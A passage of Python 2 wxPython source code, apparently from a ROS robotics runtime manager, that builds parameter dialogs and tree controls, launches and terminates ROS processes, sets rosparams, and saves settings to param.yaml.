o.SetInsertionPointEnd()
def create_tree(self, parent, items, tree, item, cmd_dic):
name = items.get('name', '')
if tree is None:
style = wx.TR_HAS_BUTTONS | wx.TR_NO_LINES | wx.TR_HIDE_ROOT | wx.TR_DEFAULT_STYLE | wx.SUNKEN_BORDER
tree = CT.CustomTreeCtrl(parent, wx.ID_ANY, agwStyle=style)
# disable focus to avoid wrong scrolling when items are checked
tree.AcceptsFocus = MethodType(lambda self: False, tree, CT.CustomTreeCtrl)
item = tree.AddRoot(name, data=tree)
tree.Bind(wx.EVT_MOTION, self.OnTreeMotion)
else:
ct_type = 1 if 'cmd' in items else 0 # 1:checkbox type
item = tree.AppendItem(item, name, ct_type=ct_type)
if 'desc' in items:
item.SetData(items.get('desc'))
if 'cmd' in items:
cmd_dic[item] = (items['cmd'], None)
pdic = self.load_dic_pdic_setup(name, items)
pnl = wx.Panel(tree, wx.ID_ANY)
add_objs = []
gdic = self.gdic_get_1st(items)
if 'param' in items:
self.new_link(item, name, pdic, gdic, pnl, 'config', items.get('param'), add_objs)
else:
self.add_cfg_info(item, item, name, None, gdic, False, None)
szr = sizer_wrap(add_objs, wx.HORIZONTAL, flag=wx.ALIGN_CENTER_VERTICAL, parent=pnl)
szr.Fit(pnl)
tree.SetItemWindow(item, pnl)
for sub in items.get('subs', []):
self.create_tree(parent, sub, tree, item, cmd_dic)
return tree
def new_link(self, item, name, pdic, gdic, pnl, link_str, prm_name, add_objs):
lkc = None
if 'no_link' not in gdic.get('flags', []):
lkc = wx.HyperlinkCtrl(pnl, wx.ID_ANY, link_str, "")
fix_link_color(lkc)
self.Bind(wx.EVT_HYPERLINK, self.OnHyperlinked, lkc)
if len(add_objs) > 0:
add_objs += [wx.StaticText(pnl, wx.ID_ANY, ' ')]
add_objs += [wx.StaticText(pnl, wx.ID_ANY, '['), lkc, wx.StaticText(pnl, wx.ID_ANY, ']')]
prm = self.get_param(prm_name)
self.add_cfg_info(lkc if lkc else item, item, name, pdic, gdic, False, prm)
def OnTreeMotion(self, event):
tree = event.GetEventObject()
pt = event.GetPosition()
event.Skip()
(item, flags) = tree.HitTest(pt)
if flags & CT.TREE_HITTEST_ONITEMLABEL == 0:
return
text = item.GetData()
if not text:
return
x = item.GetX()
y = item.GetY()
w = item.GetWidth()
h = item.GetHeight()
(x, y) = tree.CalcScrolledPosition(x, y)
iw = tree.GetItemWindow(item)
w -= iw.GetSize()[0] if iw else 0
if not wx.Rect(x, y, w, h).Contains(pt):
return
(x, y) = tree.ClientToScreen((x, y))
self.tip_info = (tree, text, wx.Rect(x, y, w, h))
if getattr(self, 'tip_timer', None) is None:
self.tip_timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.OnTipTimer, self.tip_timer)
self.tip_timer.Start(200, oneShot=True)
def OnTipTimer(self, event):
if getattr(self, 'tip_info', None):
(tree, text, rect) = self.tip_info
(w, h) = self.GetSize()
wx.TipWindow(tree, text, maxLength=w, rectBound=rect)
def OnTreeChecked(self, event):
self.OnChecked_obj(event.GetItem())
def OnChecked_obj(self, obj):
self.OnLaunchKill_obj(obj)
def OnHyperlinked(self, event):
self.OnHyperlinked_obj(event.GetEventObject())
def OnHyperlinked_obj(self, obj):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
if pdic is None or prm is None:
return
dic_list_push(gdic, 'dialog_type', 'config')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
def update_func(self, pdic, gdic, prm):
for var in prm.get('vars', []):
name = var.get('name')
gdic_v = gdic.get(name, {})
func = gdic_v.get('func')
if func is None and name in pdic:
continue
v = var.get('v')
if func is not None:
v = eval(func) if type(func) is str else func()
pdic[name] = v
hook = gdic_v.get('update_hook')
if hook:
hook(v)
hook_var = gdic_v.get('hook_var', {})
every_time = 'every_time' in hook_var.get('flags', [])
if var == gdic.get('update_func_arg_var') or every_time:
hook = hook_var.get('hook')
if hook:
hook(hook_var.get('args', {}))
if 'pub' in prm:
self.publish_param_topic(pdic, prm)
self.rosparam_set(pdic, prm)
self.update_depend_enable(pdic, gdic, prm)
def update_depend_enable(self, pdic, gdic, prm):
for var in prm.get('vars', []):
name = var.get('name')
gdic_v = gdic.get(name, {})
depend = gdic_v.get('depend')
if depend is None:
continue
vp = gdic_v.get('var')
if vp is None:
continue
v = pdic.get(depend)
if v is None:
continue
depend_bool = eval(gdic_v.get('depend_bool', 'lambda v : bool(v)'))
v = depend_bool(v)
enables_set(vp, 'depend', v)
def publish_param_topic(self, pdic, prm):
pub = prm['pub']
klass_msg = globals()[prm['msg']]
msg = klass_msg()
for (name, v) in pdic.items():
if prm.get('topic') == '/twist_cmd' and name == 'twist.angular.z':
v = -v
(obj, attr) = msg_path_to_obj_attr(msg, name)
if obj and attr in obj.__slots__:
type_str = obj._slot_types[obj.__slots__.index(attr)]
setattr(obj, attr, str_to_rosval(v, type_str, v))
if 'stamp' in prm.get('flags', []):
(obj, attr) = msg_path_to_obj_attr(msg, 'header.stamp')
setattr(obj, attr, rospy.get_rostime())
pub.publish(msg)
def obj_to_pdic_gdic_prm(self, obj, sys=False):
info = self.config_dic.get(obj)
if info is None:
sys_prm = self.get_param('sys')
prm_chk = lambda prm: prm is sys_prm if sys else prm is not sys_prm
info = next((v for v in self.config_dic.values() if v.get('obj') is obj and prm_chk(v.get('param'))), None)
if info is None:
return (None, None, None)
pdic = info.get('pdic')
prm = info.get('param')
gdic = info.get('gdic')
return (pdic, gdic, prm)
def obj_to_gdic(self, obj, def_ret=None):
(_, gdic, _) = self.obj_to_pdic_gdic_prm(obj) if obj else (None, None, None)
return gdic if gdic else def_ret
def cfg_obj_dic(self, arg_dic, sys=False, def_ret=(None, {})):
sys_prm = self.get_param('sys')
prm_chk = {
True: (lambda prm: prm is sys_prm),
False: (lambda prm: prm is not sys_prm),
None: (lambda prm: True)}.get(sys)
arg_dic_chk = lambda dic: all([dic.get(k) == v for (k, v) in arg_dic.items()])
return next(((cfg_obj, dic) for (cfg_obj, dic) in self.config_dic.items() \
if arg_dic_chk(dic) and prm_chk(dic.get('param'))), def_ret)
def cfg_dic(self, arg_dic, sys=False, def_ret={}):
(_, dic) = self.cfg_obj_dic(arg_dic, sys=sys, def_ret=(None, def_ret))
return dic
def cfg_prm_to_obj(self, arg_dic, sys=False):
return self.cfg_dic(arg_dic, sys=sys).get('obj')
def rosparam_set(self, pdic, prm):
rosparams = None
for var in prm.get('vars', []):
name = var['name']
if 'rosparam' not in var or name not in pdic:
continue
rosparam = var['rosparam']
v = pdic.get(name)
v = str(v)
cvdic = {'True': 'true', 'False': 'false'}
if v in cvdic:
v = cvdic.get(v)
if rosparams is None:
cmd = ['rosparam', 'list']
rosparams = subprocess.check_output(cmd).strip().split('\n')
nm = rosparam
nm = ('/' if len(nm) > 0 and nm[0] != '/' else '') + nm
exist = nm in rosparams
if exist:
cmd = ['rosparam', 'get', rosparam]
ov = subprocess.check_output(cmd).strip()
if ov == v:
continue
elif v == '':
continue
cmd = ['rosparam', 'set', rosparam, v] if v != '' else ['rosparam', 'delete', rosparam]
print(cmd)
subprocess.call(cmd)
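# Illustrative round-trip for a hypothetical var {'name': 'use_gpu',
# 'rosparam': 'use_gpu'} with pdic {'use_gpu': True}; the method shells out to
# the standard rosparam CLI:
#   rosparam list              # is /use_gpu already on the parameter server?
#   rosparam get use_gpu       # if so, skip when it already reads 'true'
#   rosparam set use_gpu true  # otherwise write it (an empty value deletes)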
def obj_to_add_args(self, obj, msg_box=True):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
if pdic is None or prm is None:
return None
if 'open_dialog' in gdic.get('flags', []) and msg_box:
dic_list_push(gdic, 'dialog_type', 'open')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
dlg_ret = show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
if dlg_ret != 0:
return False
self.update_func(pdic, gdic, prm)
s = ''
vars = []
for var in prm.get('vars'):
cmd_param = var.get('cmd_param')
if cmd_param:
vars.append(var)
for var in vars[:]: # copy
cmd_param = var.get('cmd_param')
if cmd_param.get('tail'):
vars.remove(var)
vars.append(var)
for var in vars[:]: # copy
name = var.get('name')
flags = gdic.get(name, {}).get('flags', [])
if 'hide' in flags or 'disable' in flags:
vars.remove(var)
for var in vars:
cmd_param = var.get('cmd_param')
name = var.get('name')
v = pdic.get(name)
if (v is None or v == '') and 'default' in cmd_param:
v = cmd_param.get('default')
if dic_eval_if_str(self, cmd_param, 'must') and (v is None or v == ''):
print('cmd_param ' + name + ' is required')
if msg_box:
wx.MessageBox('cmd_param ' + name + ' is required')
return False
if dic_eval_if_str(self, cmd_param, 'only_enable') and not v:
continue
if dic_eval_if_str(self, cmd_param, 'only_disable') and v:
continue
name = cmd_param.get('var_name', name)
unpack = cmd_param.get('unpack')
if unpack is not None:
v = ' '.join(v.split(unpack))
add = ''
dash = cmd_param.get('dash')
if dash is not None:
add += dash + name
delim = cmd_param.get('delim')
if delim is not None:
str_v = str(v)
if var.get('kind') is None:
str_v = adjust_num_str(str_v)
if var.get('kind') == 'path':
str_v = path_expand_cmd(str_v)
str_v = os.path.expandvars(os.path.expanduser(str_v))
relpath_from = var.get('relpath_from')
if relpath_from:
relpath_from = path_expand_cmd(relpath_from)
relpath_from = os.path.expandvars(os.path.expanduser(relpath_from))
str_v = os.path.relpath(str_v, relpath_from)
add += delim + str_v
if add != '':
s += add + ' '
return s.strip(' ').split(' ') if s != '' else None
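# Illustrative example with hypothetical names: a var {'name': 'pcd_file',
# 'kind': 'path', 'cmd_param': {'dash': '--', 'delim': '='}} and
# pdic {'pcd_file': '~/map.pcd'} contribute the token
# '--pcd_file=/home/user/map.pcd' (paths get user/env expansion); the method
# returns all such tokens whitespace-split, or None when nothing was built.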
def OnLaunchKill(self, event):
self.OnLaunchKill_obj(event.GetEventObject())
def OnLaunchKill_obj(self, obj):
self.alias_sync(obj)
obj = self.alias_grp_top_obj(obj)
v = obj.GetValue() # true, false depends on selected or not
add_args = self.obj_to_add_args(obj, msg_box=v) # no open dialog at kill
if add_args is False:
set_val(obj, not v)
return
(cmd_dic, _, proc_bak) = self.obj_to_cmd_dic_cmd_proc(obj)
self.launch_kill_proc(obj, cmd_dic, add_args=add_args)
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(obj)
if proc != proc_bak:
self.toggle_enable_obj(obj)
def OnROSbagPlay(self, event):
obj = event.GetEventObject()
play = self.button_play_rosbag_play
stop = self.button_stop_rosbag_play
pause = self.button_pause_rosbag_play
(_, _, prm) = self.obj_to_pdic_gdic_prm(play)
var = self.get_var(prm, 'sim_time', {})
if obj == play:
var['v'] = True
self.OnLaunchKill_obj(play)
button_color_change(play)
set_val(stop, False)
set_val(pause, False)
elif obj == stop:
set_val(stop, True)
set_val(play, False)
set_val(pause, False)
var['v'] = False
self.OnLaunchKill_obj(play)
button_color_change(stop)
elif obj == pause:
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(play)
if proc:
proc.stdin.write(' ')
def obj_to_cmd_dic(self, obj):
return next((cmd_dic for cmd_dic in self.all_cmd_dics if obj in cmd_dic), None)
def obj_to_cmd_dic_cmd_proc(self, obj):
cmd_dic = self.obj_to_cmd_dic(obj)
if cmd_dic is None:
return (None, None, None)
(cmd, proc) = cmd_dic.get(obj, (None, None))
return cmd_dic, cmd, proc
def toggle_enable_obj(self, obj):
objs = []
pfs = ['button_play_', 'button_stop_', 'button_pause_',
'button_ref_', 'text_ctrl_']
key = self.obj_key_get(obj, pfs)
if key:
objs += self.key_objs_get(pfs, key)
gdic = self.obj_to_gdic(obj, {})
objs += [eval_if_str(self, e) for e in gdic.get('ext_toggle_enables', [])]
self.toggle_enables(objs)
def toggle_enables(self, objs):
for obj in objs:
if getattr(obj, 'IsEnabled', None):
en = enables_get(obj, 'toggle', obj.IsEnabled())
enables_set(obj, 'toggle', not en)
self.alias_sync(obj)
def obj_key_get(self, obj, pfs):
name = self.name_get(obj)
if name is None:
return None
return next((name[len(pf):] for pf in pfs if name[:len(pf)] == pf), None)
def key_objs_get(self, pfs, key):
return [self.obj_get(pf + key) for pf in pfs if self.obj_get(pf + key)]
def obj_to_varpanel(self, obj, var_name):
gdic = self.obj_to_gdic(obj, {})
return gdic.get(var_name, {}).get('var')
def obj_to_varpanel_tc(self, obj, var_name):
vp = self.obj_to_varpanel(obj, var_name)
return vp.tc if vp and vp.tc else None
def load_yaml(self, filename, def_ret=None):
return load_yaml(filename, def_ret)
def add_params(self, params):
for prm in params:
if 'topic' in prm and 'msg' in prm:
klass_msg = globals()[prm['msg']]
prm['pub'] = rospy.Publisher(prm['topic'], klass_msg, latch=True, queue_size=10)
self.params += params
def setup_buttons(self, d, run_dic):
for (k, d2) in d.items():
pfs = ['button_', 'checkbox_']
obj = next((self.obj_get(pf + k) for pf in pfs if self.obj_get(pf + k)), None)
if not obj:
s = 'button_' + k
obj = StrValObj(s, False)
setattr(self, s, obj)
if not d2 or type(d2) is not dict:
continue
if 'run' in d2:
run_dic[obj] = (d2['run'], None)
set_tooltip(obj, d2)
gdic = self.gdic_get_1st(d2)
if 'param' in d2:
pdic = self.load_dic_pdic_setup(k, d2)
prm = self.get_param(d2.get('param'))
for var in prm.get('vars'):
name = var.get('name')
if name not in pdic and 'v' in var:
pdic[name] = var.get('v')
for (name, v) in pdic.items():
restore = eval(gdic.get(name, {}).get('restore', 'lambda a : None'))
restore(v)
self.add_cfg_info(obj, obj, k, pdic, gdic, False, prm)
pnls = [gdic.get(var.get('name'), {}).get('panel') for var in prm.get('vars')]
for pnl in [gdic.get('panel')] + pnls:
if pnl:
self.set_param_panel(obj, eval_if_str(self, pnl))
else:
self.add_cfg_info(obj, obj, k, None, gdic, False, None)
def obj_get(self, name):
return getattr(self, name, None)
def log_th(self, file, que, ev):
while not ev.wait(0):
s = file.readline()
if not s:
break
que.put(s)
def proc_to_cmd_dic_obj(self, proc):
for cmd_dic in self.all_cmd_dics:
obj = next((obj for (obj, v) in cmd_dic.items() if proc in v), None)
if obj:
return (cmd_dic, obj)
return (None, None)
def OnClose(self, event):
if self.quit_select() != 'quit':
return
# kill_all
for proc in self.all_procs[:]: # copy
(_, obj) = self.proc_to_cmd_dic_obj(proc)
self.launch_kill(False, 'dmy', proc, obj=obj)
for thinf in self.all_th_infs:
th_end(thinf)
self.Destroy()
def quit_select(self):
lst = [
('Save and Quit', ['save', 'quit']),
('Save to param.yaml', ['save']),
('Quit without saving', ['quit'])
]
choices = [s for (s, _) in lst]
dlg = wx.SingleChoiceDialog(self, 'Select: ', '', choices)
if dlg.ShowModal() != wx.ID_OK:
return 'not quit'
i = dlg.GetSelection() # index of choices
(_, f) = lst[i]
if 'save' in f:
self.save_param_yaml()
return 'quit' if 'quit' in f else 'not quit'
def save_param_yaml(self):
save_dic = {}
for (name, pdic) in self.load_dic.items():
if pdic and pdic != {}:
prm = self.cfg_dic({'name': name, 'pdic': pdic}).get('param', {})
no_saves = prm.get('no_save_vars', [])
pdic = pdic.copy()
for k in pdic.keys():
if k in no_saves:
del pdic[k]
save_dic[name] = pdic
names = []
for proc in self.all_procs:
(_, obj) = self.proc_to_cmd_dic_obj(proc)
name = self.cfg_dic({'obj': obj}).get('name')
names.append(name)
if 'booted_cmds' not in save_dic:
save_dic['booted_cmds'] = {}
save_dic.get('booted_cmds')['names'] = names
if save_dic != {}:
dir = src_dir()
print('saving param.yaml')
f = open(dir + 'param.yaml', 'w')
s = yaml.dump(save_dic, default_flow_style=False)
f.write(s)
f.close()
def launch_kill_proc(self, obj, cmd_dic, add_args=None):
if obj not in cmd_dic:
set_val(obj, False)
print('not implemented.')
return
v = obj.GetValue()
(cmd, proc) = cmd_dic[obj]
if not cmd:
set_val(obj, False)
proc = self.launch_kill(v, cmd, proc, add_args, obj=obj)
(cfg_obj, dic) = self.cfg_obj_dic({'obj': obj})
if cfg_obj and dic.get('run_disable'):
cfg_obj.Enable(not v)
cmd_dic[obj] = (cmd, proc)
def launch_kill(self, v, cmd, proc, add_args=None, sigint=None, obj=None, kill_children=None):
msg = None
msg = 'already launched.' if v and proc else msg
msg = 'already terminated.' if not v and proc is None else msg
msg = 'cmd not implemented.' if not cmd else msg
if msg is not None:
print(msg)
return proc
if v:
args = shlex.split(cmd)
if add_args:
args += add_args
print(args) # for debug
f = self.obj_to_gdic(obj, {}).get('stdout_func')
f = eval_if_str(self, f)
f = f if f else self.log_th
out = subprocess.PIPE if f else None
err = subprocess.STDOUT if f else None
if f == self.log_th:
err = subprocess.PIPE
shell = (len(args) > 0 and args[0] == 'do_shell_exec')
if shell:
args = ' '.join(args[1:])
proc = psutil.Popen(args, stdin=subprocess.PIPE, stdout=out, stderr=err, shell=shell)
self.all_procs.append(proc)
if f == self.log_th:
thinf = th_start(f, {'file': proc.stdout, 'que': self.log_que_stdout})
self.all_th_infs.append(thinf)
thinf = th_start(f, {'file': proc.stderr, 'que': self.log_que_stderr})
self.all_th_infs.append(thinf)
elif f:
thinf = th_start(f, {'file': proc.stdout})
self.all_th_infs.append(thinf)
else:
flags = self.obj_to_gdic(obj, {}).get('flags', [])
if sigint is None:
sigint = 'SIGTERM' not in flags
if kill_children is None:
kill_children = 'kill_children' in flags
if kill_children:
terminate_children(proc, sigint)
terminate(proc, sigint)
enables_set(obj, 'proc_wait', False)
th_start(proc_wait_thread, {'proc': proc, 'obj': obj})
if proc in self.all_procs:
self.all_procs.remove(proc)
proc = None
return proc
def gdic_get_1st(self, dic):
gdic = dic.get('gui', {})
gdic['update_func'] = self.update_func
return gdic
def load_dic_pdic_setup(self, name, dic):
name = dic.get('share_val', dic.get('name', name))
pdic = self.load_dic.get(name, {})
self.load_dic[name] = pdic
return pdic
def get_var(self, prm, var_name, def_ret=None):
return next((var for var in prm.get('vars') if var.get('name') == var_name), def_ret)
def get_param(self, prm_name):
return next((prm for prm in self.params if prm['name'] == prm_name), None)
def add_cfg_info(self, cfg_obj, obj, name, pdic, gdic, run_disable, prm):
self.config_dic[cfg_obj] = {'obj': obj, 'name': name, 'pdic': pdic, 'gdic': gdic,
'run_disable': run_disable, 'param': prm}
def set_param_panel(self, obj, parent):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
panel = ParamPanel(parent, frame=self, pdic=pdic, gdic=gdic, prm=prm)
sizer_wrap((panel,), wx.VERTICAL, 0, wx.EXPAND, 0, parent)
k = 'ext_toggle_enables'
gdic[k] = gdic.get(k, []) + [panel]
def stdout_file_search(self, file, k):
s = ''
while True:
c = file.read(1)
if not c:
return None
if c != '\r' and c != '\n':
s += c
continue
s = s.strip()
if k in s:
break
s = ''
i = s.find(k) + len(k)
return s[i:]
def point_cloud_progress_bar(self, file, ev):
obj = self.button_pcd
(pdic, _, _) = self.obj_to_pdic_gdic_prm(obj)
n = len(pdic.get('pcd_file', '').split(','))
if n == 0:
return
i = 0
while not ev.wait(0):
s = self.stdout_file_search(file, 'load ')
if not s:
break
err_key = 'failed '
if s[:len(err_key)] != err_key:
i += 1
else:
i -= 1
print(s)
wx.CallAfter(self.label_point_cloud_bar.set, 100 * i / n)
wx.CallAfter(self.label_point_cloud_bar.clear)
def rosbag_play_progress_bar(self, file, ev):
while not ev.wait(0):
s = self.stdout_file_search(file, 'Duration:')
if not s:
break
lst = s.split()
pos = str_to_float(lst[0])
# lst[1] is '/'
total = str_to_float(lst[2])
if total == 0:
continue
prg = int(100 * pos / total + 0.5)
pos = str(int(pos))
total = str(int(total))
wx.CallAfter(self.label_rosbag_play_bar.set, prg)
wx.CallAfter(self.label_rosbag_play_bar.clear)
def load_yaml(filename, def_ret=None):
source_dir = src_dir()
path = source_dir + filename
if not os.path.isfile(path):
return def_ret
print('loading ' + filename)
f = open(source_dir + filename, 'r')
d = yaml.load(f)
f.close()
return d
def src_dir():
return os.path.abspath(os.path.dirname(__file__)) + "/"
def path_expand_cmd(path):
lst = path.split('/')
s = lst[0]
if s[:2] == '$(' and s[-1] == ')':
cmd = s[2:-1].split(' ')
lst[0] = subprocess.check_output(cmd).strip()
path = '/'.join(lst)
return path
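# Example (illustrative, with a hypothetical package name): a leading
# '$( ... )' component is replaced by that command's output, so
#   path_expand_cmd('$(rospack find my_pkg)/launch/a.launch')
# expands to '<output of `rospack find my_pkg`>/launch/a.launch'; only the
# first path component is expanded.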
def get_tooltip(dic):
return dic.get('desc')
def get_tooltips(dic):
return dic.get('descs', [])
def get_tooltip_obj(obj):
if getattr(obj, 'GetToolTip', None):
t = obj.GetToolTip()
return t.GetTip() if t else None
return None
def set_tooltip(obj, dic):
set_tooltip_str(obj, get_tooltip(dic))
def set_tooltips(obj, dic):
lst = get_tooltips(dic)
if lst and getattr(obj, 'SetItemToolTip', None):
for (ix, s) in enumerate(lst):
obj.SetItemToolTip(ix, s)
def set_tooltip_str(obj, s):
if s and getattr(obj, 'SetToolTipString', None):
obj.SetToolTipString(s)
def static_box_sizer(parent, s, orient=wx.VERTICAL):
sb = wx.StaticBox(parent, wx.ID_ANY, s)
sb.Lower()
return wx.StaticBoxSizer(sb, orient)
def wx_flag_get(flags):
dic = {'top': wx.TOP, 'bottom': wx.BOTTOM, 'left': wx.LEFT, 'right': wx.RIGHT,
'all': wx.ALL, 'expand': wx.EXPAND, 'fixed_minsize': wx.FIXED_MINSIZE,
'center_v': wx.ALIGN_CENTER_VERTICAL, 'center_h': wx.ALIGN_CENTER_HORIZONTAL,
'passwd': wx.TE_PASSWORD}
lst = [dic.get(f) for f in flags if f in dic]
return reduce(lambda a, b: a + b, [0] + lst)
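# Example (illustrative): named flags are summed, which equals a bitwise OR
# for these distinct wx bits; unknown names are silently ignored:
#   wx_flag_get(['left', 'expand'])  == wx.LEFT | wx.EXPAND
#   wx_flag_get(['no_such_flag'])    == 0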
def set_size_gdic(dlg, gdic={}):
(w, h) = dlg.GetSize()
if not gdic:
gdic = getattr(dlg, 'gdic', {})
nw = gdic.get('dialog_width', w)
nh = gdic.get('dialog_height', h)
if (w, h) != (nw, nh):
dlg.SetSize((nw, nh))
def obj_refresh(obj):
if type(obj) is CT.GenericTreeItem:
while obj.GetParent():
obj = obj.GetParent()
tree = obj.GetData()
tree.Refresh()
def enables_set(obj, k, en):
if hasattr(obj, 'enables_proxy'):
(obj, k) = obj.enables_proxy
d = attr_getset(obj, 'enabLes', {})
d[k] = en
d['last_key'] = k
if hasattr(obj, 'Enable'):
obj.Enable(all(d.values()))
obj_refresh(obj)
if isinstance(obj, wx.HyperlinkCtrl):
if not hasattr(obj, 'coLor'):
obj.coLor = {True: obj.GetNormalColour(), False: '#808080'}
c = obj.coLor.get(obj.IsEnabled())
obj.SetNormalColour(c)
obj.SetVisitedColour(c)
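# enables_set/enables_get keep a per-widget dict of named enable votes (the
# odd attribute spelling 'enabLes' presumably avoids clashing with real wx
# attributes); the widget is enabled only while every vote is True.
# Illustrative:
#   enables_set(btn, 'toggle', False)  # one False vote disables btn
#   enables_set(btn, 'depend', True)   # still disabled until all votes are True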
def append_tc_limit(tc, s, rm_chars=0):
if rm_chars > 0:
tc.Remove(0, rm_chars)
tc.AppendText(s)
def get_proc_children(proc, r=False):
try:
return proc.get_children(recursive=r)
except AttributeError:
return proc.children(recursive=r)
def terminate_children(proc, sigint=False):
for child in get_proc_children(proc):
terminate_children(child, sigint)
terminate(child, sigint)
def terminate(proc, sigint=False):
if sigint:
proc.send_signal(signal.SIGINT)
else:
proc.terminate()
def cut_esc(s):
while True:
i = s.find(chr(27))
if i < 0:
break
j = s.find('m', i)
if j < 0:
break
s = s[:i] + s[j + 1:]
return s
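# Example (illustrative): cut_esc strips ANSI 'ESC ... m' color sequences from
# captured process output, e.g.
#   cut_esc('\x1b[31mERROR\x1b[0m done')  -> 'ERROR done'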
def proc_wait_thread(ev, proc, obj):
proc.wait()
wx.CallAfter(enables_set, obj, 'proc_wait', True)
th_end((None, ev))
def th_start(target, kwargs={}):
ev = threading.Event()
kwargs['ev'] = ev
th = threading.Thread(target=target, kwargs=kwargs)
th.daemon = True
th.start()
return (th, ev)
def th_end((th, ev)):
if not th:
th = threading.current_thread()
threading.Timer(1.0, th_end, ((th, ev),)).start()
return
ev.set()
th.join()
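# Typical usage pattern (illustrative): th_start returns a (thread, event)
# pair and injects the event as the worker's 'ev' kwarg, so the worker can
# poll 'while not ev.wait(0)'. th_end sets the event and joins; passing
# th=None (as proc_wait_thread does) substitutes the current thread and
# defers the join to a Timer so a worker may end itself.
#   thinf = th_start(self.log_th, {'file': proc.stdout, 'que': que})
#   ...
#   th_end(thinf)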
def que_clear(que):
with que.mutex:
que.queue.clear()
def set_path(tc, v):
tc.SetValue(v)
tc.SetInsertionPointEnd()
def set_val(obj, v):
func = getattr(obj, 'SetValue', getattr(obj, 'Check', None))
if func:
func(v)
obj_refresh(obj)
if type(obj) is wx.ToggleButton:
button_color_change(obj)
def file_dialog(parent, tc, path_inf_dic={}):
path = tc.GetValue()
path = get_top(path.split(','), path)
(dn, fn) = os.path.split(path)
path_type = path_inf_dic.get('path_type')
if path_type == 'dir':
fns = path_inf_dic.get('filenames')
if type(fns) is str and fns[-5:] == '.yaml':
fns = load_yaml(fns)
if type(fns) is not list:
fns = None
path_inf_dic['filenames'] = fns
dlg = wx.DirDialog(parent, defaultPath=path)
else:
st_dic = {'save': wx.FD_SAVE, 'multi': wx.FD_MULTIPLE}
dlg = wx.FileDialog(parent, defaultDir=dn, defaultFile=fn,
style=st_dic.get(path_type, wx.FD_DEFAULT_STYLE))
ret = show_modal(dlg)
if ret == wx.ID_OK:
path = ','.join(dlg.GetPaths()) if path_type == 'multi' else dlg.GetPath()
if path_type == 'dir' and fns:
path = ','.join([path + '/' + fn for fn in fns])
set_path(tc, path)
dlg.Destroy()
return ret
def button_color_change(btn, v=None):
if v is None and type(btn) is wx.ToggleButton:
v = btn.GetValue()
key = (v, btn.IsEnabled())
dic = {(True, True): ('#F9F9F8', '#8B8BB9'), (True, False): ('#F9F9F8', '#E0E0F0')}
(fcol, bcol) = dic.get(key, (wx.NullColour, wx.NullColour))
btn.SetForegroundColour(fcol)
btn.SetBackgroundColour(bcol)
def fix_link_color(obj):
t = type(obj)
if t is CT.GenericTreeItem or t is CT.CustomTreeCtrl:
obj.SetHyperTextVisitedColour(obj.GetHyperTextNewColour())
elif t is wx.HyperlinkCtrl:
obj.SetVisitedColour(obj.GetNormalColour())
def OnButtonColorHdr(event):
btn = event.GetEventObject()
dic = {wx.EVT_TOGGLEBUTTON.typeId: None,
wx.EVT_LEFT_DOWN.typeId: True,
wx.EVT_LEFT_UP.typeId: False}
v = dic.get(event.GetEventType(), '?')
if v != '?':
button_color_change(btn, v)
event.Skip()
btn_null_bgcol = None
def is_btn_null_bgcol(btn):
global btn_null_bgcol
bak = btn.GetBackgroundColour()
if btn_null_bgcol is None:
btn.SetBackgroundColour(wx.NullColour)
btn_null_bgcol = btn.GetBackgroundColour()
if bak != btn_null_bgcol:
btn.SetBackgroundColour(bak)
return bak == btn_null_bgcol
def button_color_hdr_setup(btn):
hdr = OnButtonColorHdr
if type(btn) is wx.ToggleButton:
btn.Bind(wx.EVT_TOGGLEBUTTON, hdr)
elif type(btn) is wx.Button and is_btn_null_bgcol(btn):
btn.Bind(wx.EVT_LEFT_DOWN, hdr)
btn.Bind(wx.EVT_LEFT_UP, hdr)
def buttons_color_hdr_setup(frm_obj):
key = 'button_'
btns = [getattr(frm_obj, nm) for nm in dir(frm_obj) if nm[:len(key)] == key]
for btn in btns:
button_color_hdr_setup(btn)
def show_modal(dlg):
buttons_color_hdr_setup(dlg)
return dlg.ShowModal()
def sizer_wrap(add_objs, orient=wx.VERTICAL, prop=0, flag=0, border=0, parent=None):
szr = wx.BoxSizer(orient)
for obj in add_objs:
szr.Add(obj, prop, flag, border)
if parent:
parent.SetSizer(szr)
return szr
def attr_getset(obj, name, def_ret):
if not hasattr(obj, name):
setattr(obj, name, def_ret)
return getattr(obj, name)
def get_top(lst, def_ret=None):
return lst[0] if len(lst) > 0 else def_ret
def enables_get(obj, k, def_ret=None):
return attr_getset(obj, 'enabLes', {}).get(k, def_ret)
def enables_get_last(obj):
k = enables_get(obj, 'last_key')
return k, enables_get(obj, k)
# dic_list util (push, pop, get)
def dic_list_push(dic, key, v):
dic_getset(dic, key, []).append(v)
def dic_list_pop(dic, key):
dic.get(key, [None]).pop()
def dic_list_get(dic, key, def_ret=None):
return dic.get(key, [def_ret])[-1]
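# Illustrative: these treat dic[key] as a stack, which is how 'dialog_type'
# is scoped around show_modal calls elsewhere in this file:
#   dic_list_push(gdic, 'dialog_type', 'open')   # gdic['dialog_type'] == ['open']
#   dic_list_get(gdic, 'dialog_type', 'config')  # -> 'open'
#   dic_list_pop(gdic, 'dialog_type')            # falls back to 'config'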
def bak_stk_push(dic, key):
if key in dic:
k = key + '_bak_str'
dic_getset(dic, k, []).append(dic.get(key))
def bak_stk_pop(dic, key):
k = key + '_bak_str'
stk = dic.get(k, [])
if len(stk) > 0:
dic[key] = stk.pop()
else:
del dic[key]
def bak_stk_set(dic, key, v):
# bak_stk_push(dic, key)
dic[key] = v
def lst_append_once(lst, v):
exist = v in lst
if not exist:
lst.append(v)
return exist
def lst_remove_once(lst, v):
exist = v in lst
if exist:
lst.remove(v)
return exist
def msg_path_to_obj_attr(msg, path):
lst = path.split('.')
obj = msg
for attr in lst[:-1]:
obj = getattr(obj, attr, None)
return obj, lst[-1]
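# Example (illustrative): walks a dotted path into a ROS message and returns
# the parent object plus the final attribute name:
#   msg_path_to_obj_attr(msg, 'header.stamp')  -> (msg.header, 'stamp')
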